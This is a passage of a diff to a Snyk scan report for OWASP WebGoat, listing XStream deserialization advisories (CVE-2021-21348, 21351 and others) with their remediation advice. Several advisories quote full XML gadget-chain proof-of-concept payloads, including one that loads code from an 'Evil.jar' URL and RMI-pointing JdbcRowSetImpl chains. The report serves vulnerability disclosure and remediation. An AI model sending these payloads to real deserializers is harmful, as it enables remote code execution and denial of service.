-              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088330",
-              "shortDescription": {
-                "text": "Medium severity - Deserialization of Untrusted Data vulnerability in com.thoughtworks.xstream:xstream"
-              },
-              "fullDescription": {
-                "text": "(CVE-2021-21348) com.thoughtworks.xstream:xstream@1.4.5"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to occupy a thread that consumes maximum CPU time and will never return. An attacker can manipulate the processed input stream and replace or inject objects, that result in executed evaluation of a malicious regular expression, causing a denial of service.\r\n\r\n## PoC\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n      <comparator class='javafx.collections.ObservableList$1'/>\r\n    </default>\r\n    <int>3</int>\r\n    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\r\n      <dataHandler>\r\n        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\r\n          <contentType>text/plain</contentType>\r\n          <is class='java.io.SequenceInputStream'>\r\n            <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\r\n              <iterator class='java.util.Scanner'>\r\n                <buf class='java.nio.HeapCharBuffer'>\r\n                  <mark>-1</mark>\r\n                  <position>0</position>\r\n                  <limit>0</limit>\r\n                  <capacity>1024</capacity>\r\n                  <address>0</address>\r\n                  <hb></hb>\r\n                  <offset>0</offset>\r\n                  <isReadOnly>false</isReadOnly>\r\n                </buf>\r\n                <position>0</position>\r\n                <matcher>\r\n                  <parentPattern>\r\n                    <pattern>\\p{javaWhitespace}+</pattern>\r\n                    <flags>0</flags>\r\n                  </parentPattern>\r\n                  <from>0</from>\r\n                  <to>0</to>\r\n                  <lookbehindTo>0</lookbehindTo>\r\n                  <text class='java.nio.HeapCharBuffer' reference='../../buf'/>\r\n                  <acceptMode>0</acceptMode>\r\n                  <first>-1</first>\r\n                  <last>0</last>\r\n                  <oldLast>-1</oldLast>\r\n                  <lastAppendPosition>0</lastAppendPosition>\r\n                  <locals/>\r\n                  <hitEnd>false</hitEnd>\r\n                  <requireEnd>false</requireEnd>\r\n                  <transparentBounds>true</transparentBounds>\r\n                  <anchoringBounds>false</anchoringBounds>\r\n                </matcher>\r\n                <delimPattern>\r\n                  <pattern>(x+)*y</pattern>\r\n                  <flags>0</flags>\r\n                </delimPattern>\r\n                <hasNextPosition>0</hasNextPosition>\r\n                <source class='java.io.StringReader'>\r\n                  <lock class='java.io.StringReader' reference='..'/>\r\n                  <str>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx</str>\r\n                  <length>32</length>\r\n                  <next>0</next>\r\n                  <mark>0</mark>\r\n                </source>\r\n              </iterator>\r\n              <type>KEYS</type>\r\n            </e>\r\n            <in class='java.io.ByteArrayInputStream'>\r\n              <buf></buf>\r\n              <pos>0</pos>\r\n              <mark>0</mark>\r\n              <count>0</count>\r\n            </in>\r\n          </is>\r\n          <consumed>false</consumed>\r\n        </dataSource>\r\n        <transferFlavors/>\r\n      </dataHandler>\r\n      <dataLen>0</dataLen>\r\n    </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\r\n    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>\r\n  </java.util.PriorityQueue>\r\n</java.util.PriorityQueue>\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found i"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.\r\n\r\n## PoC\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\r\n        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\r\n          <packet>\r\n            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\r\n              <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>\r\n                <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>\r\n                  <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>\r\n                    <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>\r\n                      <jaxbType>com.sun.rowset.JdbcRowSetImpl</jaxbType>\r\n                      <uriProperties/>\r\n                      <attributeProperties/>\r\n                      <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>\r\n                        <getter>\r\n                          <class>com.sun.rowset.JdbcRowSetImpl</class>\r\n                          <name>getDatabaseMetaData</name>\r\n                          <parameter-types/>\r\n                        </getter>\r\n                      </inheritedAttWildcard>\r\n                    </bi>\r\n                    <tagName/>\r\n                    <context>\r\n                      <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>\r\n                        <outer-class reference='../..'/>\r\n                      </marshallerPool>\r\n                      <nameList>\r\n                        <nsUriCannotBeDefaulted>\r\n                          <boolean>true</boolean>\r\n                        </nsUriCannotBeDefaulted>\r\n                        <namespaceURIs>\r\n                          <string>1</string>\r\n                        </namespaceURIs>\r\n                        <localNames>\r\n                          <string>UTF-8</string>\r\n                        </localNames>\r\n                      </nameList>\r\n                    </context>\r\n                  </bridge>\r\n                </bridge>\r\n                <jaxbObject class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>\r\n                  <javax.sql.rowset.BaseRowSet>\r\n                    <default>\r\n                      <concurrency>1008</concurrency>\r\n                      <escapeProcessing>true</escapeProcessing>\r\n                      <fetchDir>1000</fetchDir>\r\n                      <fetchSize>0</fetchSize>\r\n                      <isolation>2</isolation>\r\n                      <maxFieldSize>0</maxFieldSize>\r\n                      <maxRows>0</maxRows>\r\n                      <queryTimeout>0</queryTimeout>\r\n                      <readOnly>true</readOnly>\r\n                      <rowSetType>1004</rowSetType>\r\n                      <showDeleted>false</showDeleted>\r\n                      <dataSource>rmi://localhost:15000/CallRemoteMethod</dataSource>\r\n                      <params/>\r\n                    </default>\r\n                  </javax.sql.rowset.BaseRowSet>\r\n                  <com.sun.rowset.JdbcRowSetImpl>\r\n                    <default>\r\n                      <iMatchColumns>\r\n                        <int>-1</int>\r\n                        <int>-1</int>\r\n                        <int>-1</int>\r\n                        <int>-1</int>\r\n                        <int>-1</int>\r\n                        <int>-1</int>\r\n                        <int>-1</int>\r\n                        <int>-1</int>\r\n                        <int>-1</int>\r\n                        <int>-1</int>\r\n                      </iMatchColumns>\r\n                      <strMatchColumns>\r\n                        <string>foo</string>\r\n                        <null/>\r\n                        <null/>\r\n                        <null/>\r\n                        <null/>\r\n                        <null/>\r\n                        <null/>\r\n                        <null/>\r\n                        <null/>\r\n                        <null/>\r\n                      </strMatchColumns>\r\n                    </default>\r\n                  </com.sun.rowset.JdbcRowSetImpl>\r\n                </jaxbObject>\r\n              </dataSource>\r\n            </message>\r\n            <satellites/>\r\n            <invocationProperties/>\r\n          </packet>\r\n        </indexMap>\r\n      </comparator>\r\n    </default>\r\n    <int>3</int>\r\n    <string>javax.xml.ws.binding.attachments.inbound</string>\r\n    <string>javax.xml.ws.binding.attachments.inbound</string>\r\n  </java.util.PriorityQueue>\r\n</java.util.PriorityQueue>\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n  \n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.16 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-21344.html)\n- [XStream Changelog](http://x-stream.github.io/changes.html#1.4.16)\n- [XStream Workaround](https://x-stream.github.io/security.html#workaround)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-502",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-502", "maven"],
                 "cvssv3_baseScore": 5.3,
                 "security-severity": "5.3"
               }
@@ -375,14 +148,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.\r\n\r\n## PoC\r\n```\r\n<sorted-set>\r\n  <javax.naming.ldap.Rdn_-RdnEntry>\r\n    <type>ysomap</type>\r\n    <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>\r\n      <m__DTMXRTreeFrag>\r\n        <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>\r\n          <m__size>-10086</m__size>\r\n          <m__mgrDefault>\r\n            <__overrideDefaultParser>false</__overrideDefaultParser>\r\n            <m__incremental>false</m__incremental>\r\n            <m__source__location>false</m__source__location>\r\n            <m__dtms>\r\n              <null/>\r\n            </m__dtms>\r\n            <m__defaultHandler/>\r\n          </m__mgrDefault>\r\n          <m__shouldStripWS>false</m__shouldStripWS>\r\n          <m__indexing>false</m__indexing>\r\n          <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>\r\n            <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>\r\n              <javax.sql.rowset.BaseRowSet>\r\n                <default>\r\n                  <concurrency>1008</concurrency>\r\n                  <escapeProcessing>true</escapeProcessing>\r\n                  <fetchDir>1000</fetchDir>\r\n                  <fetchSize>0</fetchSize>\r\n                  <isolation>2</isolation>\r\n                  <maxFieldSize>0</maxFieldSize>\r\n                  <maxRows>0</maxRows>\r\n                  <queryTimeout>0</queryTimeout>\r\n                  <readOnly>true</readOnly>\r\n                  <rowSetType>1004</rowSetType>\r\n                  <showDeleted>false</showDeleted>\r\n                  <dataSource>rmi://localhost:15000/CallRemoteMethod</dataSource>\r\n                  <listeners/>\r\n                  <params/>\r\n                </default>\r\n              </javax.sql.rowset.BaseRowSet>\r\n              <com.sun.rowset.JdbcRowSetImpl>\r\n                <default/>\r\n              </com.sun.rowset.JdbcRowSetImpl>\r\n            </fPullParserConfig>\r\n            <fConfigSetInput>\r\n              <class>com.sun.rowset.JdbcRowSetImpl</class>\r\n              <name>setAutoCommit</name>\r\n              <parameter-types>\r\n                <class>boolean</class>\r\n              </parameter-types>\r\n            </fConfigSetInput>\r\n            <fConfigParse reference='../fConfigSetInput'/>\r\n            <fParseInProgress>false</fParseInProgress>\r\n          </m__incrementalSAXSource>\r\n          <m__walker>\r\n            <nextIsRaw>false</nextIsRaw>\r\n          </m__walker>\r\n          <m__endDocumentOccured>false</m__endDocumentOccured>\r\n          <m__idAttributes/>\r\n          <m__textPendingStart>-1</m__textPendingStart>\r\n          <m__useSourceLocationProperty>false</m__useSourceLocationProperty>\r\n          <m__pastFirstElement>false</m__pastFirstElement>\r\n        </m__dtm>\r\n        <m__dtmIdentity>1</m__dtmIdentity>\r\n      </m__DTMXRTreeFrag>\r\n      <m__dtmRoot>1</m__dtmRoot>\r\n      <m__allowRelease>false</m__allowRelease>\r\n    </value>\r\n  </javax.naming.ldap.Rdn_-RdnEntry>\r\n  <javax.naming.ldap.Rdn_-RdnEntry>\r\n    <type>ysomap</type>\r\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\r\n      <m__obj class='string'>test</m__obj>\r\n    </value>\r\n  </javax.naming.ldap.Rdn_-RdnEntry>\r\n</sorted-set>\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many o"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.\r\n\r\n## PoC\r\n```\r\n<sorted-set>\r\n  <javax.naming.ldap.Rdn_-RdnEntry>\r\n    <type>ysomap</type>\r\n    <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>\r\n      <m__DTMXRTreeFrag>\r\n        <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>\r\n          <m__size>-10086</m__size>\r\n          <m__mgrDefault>\r\n            <__overrideDefaultParser>false</__overrideDefaultParser>\r\n            <m__incremental>false</m__incremental>\r\n            <m__source__location>false</m__source__location>\r\n            <m__dtms>\r\n              <null/>\r\n            </m__dtms>\r\n            <m__defaultHandler/>\r\n          </m__mgrDefault>\r\n          <m__shouldStripWS>false</m__shouldStripWS>\r\n          <m__indexing>false</m__indexing>\r\n          <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>\r\n            <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>\r\n              <javax.sql.rowset.BaseRowSet>\r\n                <default>\r\n                  <concurrency>1008</concurrency>\r\n                  <escapeProcessing>true</escapeProcessing>\r\n                  <fetchDir>1000</fetchDir>\r\n                  <fetchSize>0</fetchSize>\r\n                  <isolation>2</isolation>\r\n                  <maxFieldSize>0</maxFieldSize>\r\n                  <maxRows>0</maxRows>\r\n                  <queryTimeout>0</queryTimeout>\r\n                  <readOnly>true</readOnly>\r\n                  <rowSetType>1004</rowSetType>\r\n                  <showDeleted>false</showDeleted>\r\n                  <dataSource>rmi://localhost:15000/CallRemoteMethod</dataSource>\r\n                  <listeners/>\r\n                  <params/>\r\n                </default>\r\n              </javax.sql.rowset.BaseRowSet>\r\n              <com.sun.rowset.JdbcRowSetImpl>\r\n                <default/>\r\n              </com.sun.rowset.JdbcRowSetImpl>\r\n            </fPullParserConfig>\r\n            <fConfigSetInput>\r\n              <class>com.sun.rowset.JdbcRowSetImpl</class>\r\n              <name>setAutoCommit</name>\r\n              <parameter-types>\r\n                <class>boolean</class>\r\n              </parameter-types>\r\n            </fConfigSetInput>\r\n            <fConfigParse reference='../fConfigSetInput'/>\r\n            <fParseInProgress>false</fParseInProgress>\r\n          </m__incrementalSAXSource>\r\n          <m__walker>\r\n            <nextIsRaw>false</nextIsRaw>\r\n          </m__walker>\r\n          <m__endDocumentOccured>false</m__endDocumentOccured>\r\n          <m__idAttributes/>\r\n          <m__textPendingStart>-1</m__textPendingStart>\r\n          <m__useSourceLocationProperty>false</m__useSourceLocationProperty>\r\n          <m__pastFirstElement>false</m__pastFirstElement>\r\n        </m__dtm>\r\n        <m__dtmIdentity>1</m__dtmIdentity>\r\n      </m__DTMXRTreeFrag>\r\n      <m__dtmRoot>1</m__dtmRoot>\r\n      <m__allowRelease>false</m__allowRelease>\r\n    </value>\r\n  </javax.naming.ldap.Rdn_-RdnEntry>\r\n  <javax.naming.ldap.Rdn_-RdnEntry>\r\n    <type>ysomap</type>\r\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\r\n      <m__obj class='string'>test</m__obj>\r\n    </value>\r\n  </javax.naming.ldap.Rdn_-RdnEntry>\r\n</sorted-set>\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n  \n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.16 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-21351.html)\n- [XStream Changelog](http://x-stream.github.io/changes.html#1.4.16)\n- [XStream Workaround](https://x-stream.github.io/security.html#workaround)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-21351.yaml)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-502",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-502", "maven"],
                 "cvssv3_baseScore": 5.4,
                 "security-severity": "5.4"
               }
@@ -397,15 +166,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. \r\n\r\n## PoC\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n      <comparator class='javafx.collections.ObservableList$1'/>\r\n    </default>\r\n    <int>3</int>\r\n    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\r\n      <dataHandler>\r\n        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\r\n          <contentType>text/plain</contentType>\r\n          <is class='java.io.SequenceInputStream'>\r\n            <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\r\n              <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>\r\n                <names class='java.util.AbstractList$Itr'>\r\n                  <cursor>0</cursor>\r\n                  <lastRet>-1</lastRet>\r\n                  <expectedModCount>0</expectedModCount>\r\n                  <outer-class class='java.util.Arrays$ArrayList'>\r\n                    <a class='string-array'>\r\n                      <string>Evil</string>\r\n                    </a>\r\n                  </outer-class>\r\n                </names>\r\n                <processorCL class='java.net.URLClassLoader'>\r\n                  <ucp class='sun.misc.URLClassPath'>\r\n                    <urls serialization='custom'>\r\n                      <unserializable-parents/>\r\n                      <vector>\r\n                        <default>\r\n                          <capacityIncrement>0</capacityIncrement>\r\n                          <elementCount>1</elementCount>\r\n                          <elementData>\r\n                            <url>http://127.0.0.1:80/Evil.jar</url>\r\n                          </elementData>\r\n                        </default>\r\n                      </vector>\r\n                    </urls>\r\n                    <path>\r\n                      <url>http://127.0.0.1:80/Evil.jar</url>\r\n                    </path>\r\n                    <loaders/>\r\n                    <lmap/>\r\n                  </ucp>\r\n                  <package2certs class='concurrent-hash-map'/>\r\n                  <classes/>\r\n                  <defaultDomain>\r\n                    <classloader class='java.net.URLClassLoader' reference='../..'/>\r\n                    <principals/>\r\n                    <hasAllPerm>false</hasAllPerm>\r\n                    <staticPermissions>false</staticPermissions>\r\n                    <key>\r\n                      <outer-class reference='../..'/>\r\n                    </key>\r\n                  </defaultDomain>\r\n                  <initialized>true</initialized>\r\n                  <pdcache/>\r\n                </processorCL>\r\n              </iterator>\r\n              <type>KEYS</type>\r\n            </e>\r\n            <in class='java.io.ByteArrayInputStream'>\r\n              <buf></buf>\r\n              <pos>-2147483648</pos>\r\n              <mark>0</mark>\r\n              <count>0</count>\r\n            </in>\r\n          </is>\r\n          <consumed>false</consumed>\r\n        </dataSource>\r\n        <transferFlavors/>\r\n      </dataHandler>\r\n      <dataLen>0</dataLen>\r\n    </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\r\n    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>\r\n  </java.util.PriorityQueue>\r\n</java.util.PriorityQueue>\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. \r\n\r\n## PoC\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n      <comparator class='javafx.collections.ObservableList$1'/>\r\n    </default>\r\n    <int>3</int>\r\n    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\r\n      <dataHandler>\r\n        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\r\n          <contentType>text/plain</contentType>\r\n          <is class='java.io.SequenceInputStream'>\r\n            <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\r\n              <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>\r\n                <names class='java.util.AbstractList$Itr'>\r\n                  <cursor>0</cursor>\r\n                  <lastRet>-1</lastRet>\r\n                  <expectedModCount>0</expectedModCount>\r\n                  <outer-class class='java.util.Arrays$ArrayList'>\r\n                    <a class='string-array'>\r\n                      <string>Evil</string>\r\n                    </a>\r\n                  </outer-class>\r\n                </names>\r\n                <processorCL class='java.net.URLClassLoader'>\r\n                  <ucp class='sun.misc.URLClassPath'>\r\n                    <urls serialization='custom'>\r\n                      <unserializable-parents/>\r\n                      <vector>\r\n                        <default>\r\n                          <capacityIncrement>0</capacityIncrement>\r\n                          <elementCount>1</elementCount>\r\n                          <elementData>\r\n                            <url>http://127.0.0.1:80/Evil.jar</url>\r\n                          </elementData>\r\n                        </default>\r\n                      </vector>\r\n                    </urls>\r\n                    <path>\r\n                      <url>http://127.0.0.1:80/Evil.jar</url>\r\n                    </path>\r\n                    <loaders/>\r\n                    <lmap/>\r\n                  </ucp>\r\n                  <package2certs class='concurrent-hash-map'/>\r\n                  <classes/>\r\n                  <defaultDomain>\r\n                    <classloader class='java.net.URLClassLoader' reference='../..'/>\r\n                    <principals/>\r\n                    <hasAllPerm>false</hasAllPerm>\r\n                    <staticPermissions>false</staticPermissions>\r\n                    <key>\r\n                      <outer-class reference='../..'/>\r\n                    </key>\r\n                  </defaultDomain>\r\n              